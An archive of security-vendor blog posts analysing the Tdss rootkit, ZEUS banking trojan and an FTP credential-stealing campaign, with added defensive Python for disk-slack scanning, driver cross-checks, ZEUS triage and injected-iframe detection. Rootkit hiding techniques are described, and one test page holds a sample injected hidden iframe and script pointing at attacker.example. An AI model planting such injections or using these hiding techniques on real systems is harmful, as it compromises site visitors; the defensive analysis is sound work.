Prevx Blog

Nov 20th

Tdss rootkit silently owns the net

Posted by: Marco Giuliani


Rootkit and antirootkit development has always been a cat-and-mouse game, and the game has intensified since rootkits became the close companions of trojans, backdoors and other infections used to steal user credentials or to gain access to infected PCs.

Writing trojans or backdoors rarely brings any new technique; most of the new samples we analyze reuse old, well-known tricks. Rootkit development is the real field where malware writers show their skill, their potential and their imagination.

In the beginning, writing rootkits was mostly a pure exercise, a way to show how easily the system could be compromised. Now rootkits work hand in hand with trojans and backdoors to help them subvert users' systems.

Malware writers are sending a "catch me if you can" message to antivirus companies, a hide-and-seek game in which rootkit techniques stay a step ahead of security countermeasures. They open the road wide for every other piece of malware, which can then afford to use even old and known tricks: hidden by the rootkit, invisible to everyone, it is free to do as it pleases. The key word is money.

The third variant of the Tdss rootkit is the latest member of the Tdss family, and it is spreading quickly around the world. While many rootkits are developed only as proofs of concept, this is not one of them. Tdss is well known to antivirus companies because its goal is total control of the infected PCs, which it uses as zombies for its botnet.

Over the years it has consistently shown a team of skilled people behind it, applying advanced techniques that often bypass antirootkit software. This latest variant could fairly be called the stealthiest rootkit in the wild.

This infection brings together the best of the MBR rootkit, the best of Rustock.C and the experience of the older Tdss variants. The result is an infection that is spreading quickly on the net and is undetected by almost every security product and third-party antirootkit tool.

The infection arrives through the usual dropper, spread on peer-to-peer networks and on crack and keygen websites, and it needs administrator privileges to run its payload. If UAC is disabled, or the user voluntarily grants admin permissions, the infection runs even on Windows Vista and Windows 7. That is likely to be the usual scenario: a user who went looking for a specific crack does not care when UAC warns him, and gives the wanted crack the admin privileges it asks for.

When run, the infection uses a technique similar to the one applied by the MBR rootkit: all kernel mode and user mode components are stored in the last sectors of the hard drive, outside the file system. There they appear as nothing but raw bytes, so any check that works at the file level never sees them. Tdss takes the trick a step further by encoding its components before writing them to disk; they are encoded and decoded on the fly.

Tdss user mode components
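Components parked in the sectors past the end of the last partition are invisible to file-level scanning, but they are not invisible to a raw read of the disk. The script below is an added example, not Prevx's tooling or anything recovered from the rootkit: it parses the MBR partition table to find where the last partition ends and then flags any sector beyond that point which is neither blank nor low-entropy, which is what an encoded payload stored outside the file system would look like. The disk image, the partition layout and the "encoded" blob (deterministic random bytes) are all constructed in build_demo_image(); the 6.0 bits-per-byte threshold is an assumption chosen to separate zeroed or text-like slack from encoded data.

```python
"""Added example, not Prevx's code: flag encoded data hidden in the sectors
after the last partition of a raw disk image, the region the post says Tdss
uses to store its components outside the file system. The image here is
constructed in build_demo_image(); pass a file path to run it on a real image."""
import math
import random
import struct
import sys

SECTOR = 512


def partitions_from_mbr(image: bytes):
    """(start_lba, sector_count) for each used entry of the MBR partition table."""
    if len(image) < SECTOR or image[510:512] != b"\x55\xaa":
        raise ValueError("no MBR boot signature")
    parts = []
    for i in range(4):
        base = 446 + 16 * i                       # 4 entries of 16 bytes at offset 446
        ptype = image[base + 4]                   # partition type byte
        start, count = struct.unpack_from("<II", image, base + 8)   # LBA start, sector count
        if ptype and count:
            parts.append((start, count))
    return parts


def last_partition_end(image: bytes) -> int:
    """First LBA after the last partition; everything from here on is slack."""
    parts = partitions_from_mbr(image)
    if not parts:
        raise ValueError("partition table is empty")
    return max(start + count for start, count in parts)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant block, close to 8.0 for encoded/encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def suspicious_tail_sectors(image: bytes, threshold: float = 6.0):
    """LBAs past the last partition that hold non-blank, high-entropy content.

    Zeroed slack is normal, and leftover filesystem remnants score low;
    an encoded payload scores well above `threshold` (an assumed cut-off).
    """
    end = last_partition_end(image)
    hits = []
    for lba in range(end, len(image) // SECTOR):
        sector = image[lba * SECTOR:(lba + 1) * SECTOR]
        if sector.count(0) == SECTOR:             # blank sector, nothing to see
            continue
        if shannon_entropy(sector) >= threshold:
            hits.append(lba)
    return hits


def build_demo_image(total_sectors: int = 64, slack_sectors: int = 8,
                     hidden_sectors: int = 4) -> bytes:
    """Constructed image: MBR, one NTFS-typed partition, zeroed slack, and an
    'encoded' blob (deterministic random bytes) in the last `hidden_sectors`."""
    part_start = 1
    part_count = total_sectors - 1 - slack_sectors
    mbr = bytearray(SECTOR)
    mbr[446 + 4] = 0x07                           # partition type: NTFS
    struct.pack_into("<II", mbr, 446 + 8, part_start, part_count)
    mbr[510:512] = b"\x55\xaa"
    body = bytearray(part_count * SECTOR)
    slack = bytearray(slack_sectors * SECTOR)
    if hidden_sectors:
        rnd = random.Random(0x7D55)
        payload = bytes(rnd.getrandbits(8) for _ in range(hidden_sectors * SECTOR))
        slack[-len(payload):] = payload
    return bytes(mbr + body + slack)


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_image()
    print("slack starts at LBA", last_partition_end(image))
    print("suspicious tail sectors:", suspicious_tail_sectors(image))
```

On a live system the raw read itself is the hard part: the post's point is that the rootkit filters disk I/O below the file system, so this kind of scan is only trustworthy when run against an image taken from another operating system, or from a clean boot medium.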

Then, to get loaded at Windows startup, Tdss uses a technique we have seen applied by the Rustock.C rootkit, and by others such as Neprodoor: infecting Windows system drivers. Tdss walks back the chain of drivers that handle hard drive I/O looking for the last miniport driver object. When it finds it, it infects that driver's PE file by overwriting 824 bytes of its resource section. This defeats a simple check that some antirootkits use to detect hidden rootkits: the file size cross check. Rootkits that infect files usually hide their presence by serving the original file instead of the infected one. Antirootkits that use raw disk reading can read below the filter applied by such rootkits and cross check file sizes looking for discrepancies.

This time it is different, for two evident reasons: currently no antirootkit is able to bypass the disk filtering technique used by Tdss, and even if one could, a file size cross check would not detect this rootkit, because the original and the infected files have exactly the same size.
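The size cross check fails here by construction: the loader is written over existing bytes inside the resource section, so the file's length never changes. The following added example (not Prevx's code, and not a real driver) models that in-place overwrite and contrasts the weak check with what a raw-versus-filtered comparison should actually do: compare a digest of the two views, and when it fires, locate the patched stretch. The "clean driver" and the 0x2000 offset of its zero-filled resource section are constructed stand-ins; only the 824-byte figure comes from the post.

```python
"""Added example, not Prevx's code: why a file-size cross check cannot catch a
size-preserving infection like the one described, and what a raw-versus-
filtered comparison should check instead. Both 'views' of the driver file are
constructed byte strings; a real tool would read one through the Windows API
and the other from raw sectors."""
import hashlib

LOADER_SIZE = 824        # the post's figure for the overwritten stretch of .rsrc


def size_cross_check(fs_view: bytes, raw_view: bytes) -> bool:
    """The weak check: True means 'no discrepancy found'."""
    return len(fs_view) == len(raw_view)


def content_cross_check(fs_view: bytes, raw_view: bytes) -> bool:
    """The stronger check: True means the two views hash to the same digest."""
    return hashlib.sha256(fs_view).digest() == hashlib.sha256(raw_view).digest()


def differing_ranges(a: bytes, b: bytes):
    """Contiguous (offset, length) runs where two equal-length buffers differ.
    Locates the patched stretch once the content check has fired."""
    if len(a) != len(b):
        raise ValueError("views differ in size; size_cross_check already fails")
    runs, start = [], None
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y and start is None:
            start = i
        elif x == y and start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, len(a) - start))
    return runs


def infect_in_place(original: bytes, offset: int, loader: bytes) -> bytes:
    """Model of the trick: overwrite len(loader) bytes inside the file without
    changing its length, so file-size bookkeeping stays consistent."""
    if offset + len(loader) > len(original):
        raise ValueError("loader does not fit")
    return original[:offset] + loader + original[offset + len(loader):]


def demo_views():
    """Constructed clean 'driver' and the same bytes after infection.
    The 'resource section' is a zero-filled 4 KiB stretch at rsrc_offset."""
    rsrc_offset = 0x2000
    clean = bytes(range(256)) * 32 + bytes(0x1000)              # 8 KiB code-ish + 4 KiB zeroed .rsrc
    loader = bytes((i % 254) + 1 for i in range(LOADER_SIZE))   # never 0x00, so the diff is one run
    infected = infect_in_place(clean, rsrc_offset, loader)
    return clean, infected, rsrc_offset


if __name__ == "__main__":
    clean, infected, off = demo_views()
    print("size check says clean:   ", size_cross_check(clean, infected))
    print("content check says clean:", content_cross_check(clean, infected))
    print("patched ranges:", [(hex(o), n) for o, n in differing_ranges(clean, infected)])
```

The digest comparison is only as good as the unfiltered view it is given; with this rootkit, as the text says, no tool yet obtains one from the running system, so the comparison needs a reference digest taken from a known-clean copy of the driver rather than from the same disk.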

When the infected driver runs, it executes the 824-byte loader, which in turn runs the kernel mode component of the infection. This creates a fake driver object and its device object, and hijacks every disk I/O communication at the level of the driver chain where the infected driver sits (the infected driver may be, for example, atapi.sys or iastor.sys).

Tdss fake driver object

The rootkit intercepts every communication and filters out IRP_MJ_SCSI packets that have specific SRB flags set. By doing so, it hides the patched driver on disk and every disk sector where its components are stored. This is a really effective disk hiding technique.

Tdss then registers a load image notify routine to intercept every process that loads the kernel32.dll library. When it catches one, it injects its user mode components, tdlwsp.dll and tdlcmd.dll, into that process. These turn the infected PC into a botnet zombie. Config.ini, another component of the infection, holds the botnet settings: the commands to execute, the bot ID and the C&C server addresses. Communication with the C&C servers is SSL encrypted, to evade HTTP filters.

Tdss configuration file

Tdss is indeed a really worrying infection: it is in the wild and spreading quickly, intercepted and detected by almost no one. Some antiviruses may raise a warning about the presence of tdlcmd.dll or tdlwsp.dll without being able to do anything about it. Most of the time users are not warned at all; they simply do not know that their PC is part of a botnet, under the control of malware writers who can use it as they please.

We heartily recommend not downloading or using cracks or keygens; they are often the vector for very nasty infections.

Despite the complexity of the infection, we are able to detect and clean it, and we will update Prevx with the appropriate detection and cleanup routines. In the meantime, any Prevx customer affected by this infection can contact our technical support, who will remove it by remote assistance.


Nov 13th

I had the pleasure last night of seeing Jacques receive one of the most notable accolades in the IT industry when he was awarded the British Computer Society title of Young IT Professional Of The Year. It was the first time I have ever seen Jacques genuinely nervous and anxious as the list of finalists was read out. Having witnessed first hand Jacques' achievements, I know how deserving he is of the award.

Here's the link to the BCS announcement.


Sep 18th

ZEUS has been around in various generations for a few years now. Here is a link to an article from 2007, when a ZEUS Trojan infiltrated several prominent US organizations: ZEUS infects US organizations.

ZEUS is easily and commonly dropped by an exploit, and is also delivered through social engineering that exploits job sites and the like. The ZEUS Trojan, or ZEUS Banking Trojan, is also referred to by some security firms as WSNPOEM and Gorhax.

Outwardly, a ZEUS-infected PC shows no obvious signs of infection. The ZEUS Banking Trojan can rifle your Internet cache for stored login and password credentials, eavesdrop on keystrokes and screen contents, and even modify a web page with form injection to capture additional fields, just in case what the criminals want to steal isn't already on the page.

As a recent, much hyped article claimed, ZEUS frequently bypasses popular antivirus and Internet security suites. The criminals are careful to infect just a few PCs with each copy of the Trojan, thereby avoiding detection by honeypots and honeynets and the researcher attention in security labs that would follow. By the time each copy of a ZEUS Trojan is identified by security researchers, its job is done and a fresh version has been dispatched to take over its role.

No one has an accurate account of the real number of ZEUS infections, but it must run to millions of PCs worldwide. We uncovered a cache of stolen information captured by a ZEUS Trojan earlier this year. This data came from 160,000 PCs infected by ZEUS Trojans. During the six weeks we tracked this crop of infections, it reached a peak of 20,000 new PC infections per day.

Now for some tell-tale signs of ZEUS. With this information you will be able to check your PC for signs of a ZEUS infection. You may also use it to help you remove the ZEUS Trojan, or at least disable it.

The ZEUS Trojan commonly uses names like NTOS.EXE, LD08.EXE, LD12.EXE, PP06.EXE, PP08.EXE, SRA64.EXE and, more generally, LDnn.EXE and PPnn.EXE, so search your PC for files with names like these. The ZEUS Trojan is typically between 40 KB and 150 KB in size.

Also look for a folder named WSNPOEM; this is another common sign of a ZEUS infection.

Finally, check the Registry for Run keys referencing any of these names.

Do not assume that because your antivirus or Internet security suite shows no signs of infection, your PC is free of the ZEUS Trojan.
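The three checks above (file names, the WSNPOEM folder, Run-key references) can be scripted so they are applied consistently across many machines. The script below is an added example, not Prevx's tooling: it walks a directory tree for the name patterns given in the post, treats the 40 KB to 150 KB range as a soft indicator rather than a filter, looks for a WSNPOEM directory, and scans Run-key values for references to the same names. The directory tree and the Run-key export it inspects are constructed (build_demo_tree() and DEMO_RUN_VALUES); on a real machine you would point scan_tree() at the system drive and feed scan_run_values() the values exported from the HKLM and HKCU Run keys.

```python
"""Added example, not Prevx's code: triage for the ZEUS tell-tale signs listed
in the post. The file tree and the Run-key values below are constructed."""
import os
import re
import tempfile

# NTOS.EXE, SRA64.EXE and the LDnn.EXE / PPnn.EXE families named in the post.
ZEUS_NAME = re.compile(r"(?<![\w.])(?:ntos|sra64|(?:ld|pp)\d{2})\.exe\b", re.IGNORECASE)
ZEUS_FOLDER = "wsnpoem"
SIZE_MIN, SIZE_MAX = 40 * 1024, 150 * 1024      # typical size range given in the post


def scan_tree(root: str):
    """Findings as (kind, path) tuples:
    'folder'        a WSNPOEM directory
    'file'          a matching name inside the typical size range
    'file-odd-size' a matching name outside it (still worth a look; size is a heuristic)"""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d.lower() == ZEUS_FOLDER:
                findings.append(("folder", os.path.join(dirpath, d)))
        for f in filenames:
            if ZEUS_NAME.fullmatch(f):
                path = os.path.join(dirpath, f)
                size = os.path.getsize(path)
                kind = "file" if SIZE_MIN <= size <= SIZE_MAX else "file-odd-size"
                findings.append((kind, path))
    return sorted(findings)


def scan_run_values(values: dict):
    """Flag Run-key values whose command line references one of the names.
    `values` maps value name -> command string, as exported from a Run key."""
    return sorted((name, cmd) for name, cmd in values.items() if ZEUS_NAME.search(cmd))


def build_demo_tree() -> str:
    """Constructed tree: one ZEUS-like binary in the size window, one name
    match that is far too small, a WSNPOEM folder, and a benign executable."""
    root = tempfile.mkdtemp(prefix="zeus-triage-")
    sys32 = os.path.join(root, "WINDOWS", "system32")
    os.makedirs(os.path.join(sys32, "wsnpoem"))
    for name, size in (("ntos.exe", 80 * 1024), ("ld08.exe", 2048), ("notepad.exe", 70 * 1024)):
        with open(os.path.join(sys32, name), "wb") as fh:
            fh.write(b"\x00" * size)             # placeholder content; only name and size matter here
    return root


# Constructed Run-key export; the 'ld12' value is the kind of entry to flag.
DEMO_RUN_VALUES = {
    "SoundMan": r"C:\WINDOWS\SOUNDMAN.EXE",
    "ld12": r"C:\WINDOWS\system32\ld12.exe",
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
}


if __name__ == "__main__":
    for kind, path in scan_tree(build_demo_tree()):
        print(f"{kind:14s} {path}")
    for name, cmd in scan_run_values(DEMO_RUN_VALUES):
        print(f"run-key        {name} = {cmd}")
```

A name match is a lead, not a verdict: quarantine the file and check its hash with your vendor before deleting anything, and remember that, as the post warns, a clean result from the installed antivirus proves nothing on its own.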


Sep 14th

Thought I'd get this out via the blog to get maximum attention. Prevx is looking to hire a Mac OS X developer to develop a cloud AV client. Should have experience in C/C++ for system level development as well as being able to develop GUIs. If this sounds of interest to you, drop a mail to weblog@prevx.com.


Aug 16th

FTP Reloaded: My Website has been hacked!

Posted by: Jacques Erasmus


As you might know if you have been following our blog, last month we blogged about an FTP password stealer that's spreading in the wild here.

This infector managed to steal credentials from many large companies; nearly 90,000 logins were found in total. We worked with local and international law enforcement to get that site shut down and to inform as many victims as we could.

Yesterday, while roaming the dark depths of the web, Mike "Rambo" Johnson, one of our malware hunting rockstars, managed to find the latest incarnation of this threat.

On this occasion there is not much difference: it's an entirely new list of domains containing, yet again, a bunch of new "big names" which we are in the process of notifying. Overnight the number of stolen credentials went from 624 to 4,338.

The infection begins with a visit to what appears to be a harmless website, hxxp://-lena-kolesnikova.com/ (NSFW!)

Two separate scripts are all this particular URL has to offer; unfortunately, there is no legitimate material to be found.

Most of the injected sites contain what's called a rotator, which rotates between malware packs bought by people who want their malware spread.

When we say "injected" we mean that the FTP credentials have been stolen and an iframe or script has been injected into the HTML pages of the site.

Script 1 failed to execute on this machine, as the IP was blocked due to previous visits throughout that day.


Script 2 is where the FtpBot is launched from. This URL is also a rotator and will serve up different malware depending on geographic location, installed software and time of day.


The exploit kit used by this malware is called FSPACK; there are so many of these around these days that the name really has little value.

So let's move on to the meaty stuff. On successful exploitation, this is what you could expect to see, traffic-wise, on your machine.


This shows how the pack itself fetches even more malware on top of the pieces already dropped.

Now it begins checking for commands...


It tries to connect to an admin panel; however, it appears that the panel is not configured properly by the malware owners and doesn't seem to be functioning as far as statistics gathering is concerned.

Once this process is complete, the malware installed on the victim machine harvests FTP details from known FTP clients (Total Commander, CuteFTP, FlashFXP and a few others) and uploads them to a list on the server.

The stolen details are sent to a text file on the server known as list.txt, in the format "ftp://username:password@ftp.domain.com".

This list is then dished out to infected clients, which log in to the FTP sites and inject an iframe or script into the web pages. The goal is to infect more users who visit these sites, using the same exploit pack shown above.
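A site owner whose FTP credentials were on such a list needs to find the injected includes, and "look at the pages" does not scale past a handful of files. The following added example (not Prevx's code, and not the bot's) parses a page with the standard library's HTML parser and flags two things: iframe or script includes whose host is not the site's own host, and iframes sized or styled to be invisible, which is the usual way an injected frame is kept out of the visitor's sight. The two pages are constructed; attacker.example is a placeholder host, and treating any foreign include as suspicious assumes the site serves its own scripts, so a legitimate CDN or analytics host would need to be allowlisted.

```python
"""Added example, not Prevx's code: scan a site's HTML for iframe/script
includes that look injected after an FTP credential compromise of the kind
described. The two pages below are constructed; attacker.example is a
placeholder host, not a real indicator."""
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = ("display:none", "visibility:hidden")


class IncludeCollector(HTMLParser):
    """Collect every <iframe src> and <script src> with its attributes."""

    def __init__(self):
        super().__init__()
        self.includes = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if "src" in a:
            self.includes.append((tag, a))


def _is_hidden(attrs: dict) -> bool:
    """1x1 or 0x0 frames, or a style that hides the element."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width", "").strip() in ("0", "1") or attrs.get("height", "").strip() in ("0", "1")
    return tiny or any(s in style for s in HIDDEN_STYLE)


def find_injected_includes(html: str, site_host: str):
    """(tag, src, reason) for includes that look injected:
    'foreign'       the src host is not site_host or one of its subdomains
    'hidden-iframe' an iframe sized or styled to be invisible
    Relative srcs have no host and are treated as the site's own."""
    parser = IncludeCollector()
    parser.feed(html)
    site_host = site_host.lower()
    hits = []
    for tag, attrs in parser.includes:
        src = attrs["src"]
        host = (urlparse(src).hostname or "").lower()
        if host and host != site_host and not host.endswith("." + site_host):
            hits.append((tag, src, "foreign"))
        if tag == "iframe" and _is_hidden(attrs):
            hits.append((tag, src, "hidden-iframe"))
    return hits


# Constructed pages: the clean one, and the same page with an injected
# hidden iframe and a foreign script appended just before </body>.
CLEAN_PAGE = """<html><head><script src="/js/menu.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="https://www.example.org/map" width="400" height="300"></iframe>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://attacker.example/in.cgi?3" width="1" height="1" style="visibility: hidden"></iframe>'
    '<script src="http://attacker.example/load.js"></script></body>')


if __name__ == "__main__":
    for page_name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(page_name, find_injected_includes(page, "www.example.org"))
```

Run it over a local copy of every page on the site (the copy fetched over FTP, since the injected code may be served only to some visitors by the rotator the post describes), and change the FTP password before cleaning, or the bot will simply put the includes back.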

This is usually where we would finish the blog, pat ourselves on the back and think job done; however, we managed to find the site that the people responsible for these infections are using to monetize it.

In my opinion, the way to protect against FTP login stealers like these is as follows:

- Don't use FTP for anything important; use encrypted protocols

- Don't rely on software such as Total Commander, FlashFXP, CuteFTP et al. to protect your credentials; the methods they use to store passwords are weak

Prevx 3.0 and Prevx 3.0 Enterprise edition both protect against these threats.

Below are some screenshots, comments and translations from Russian to English.

I think the pictures speak for themselves, however badly they are translated. One thing I can say is that their website isn't very pretty, but I guess they are getting enough customers even with an ugly looking site!
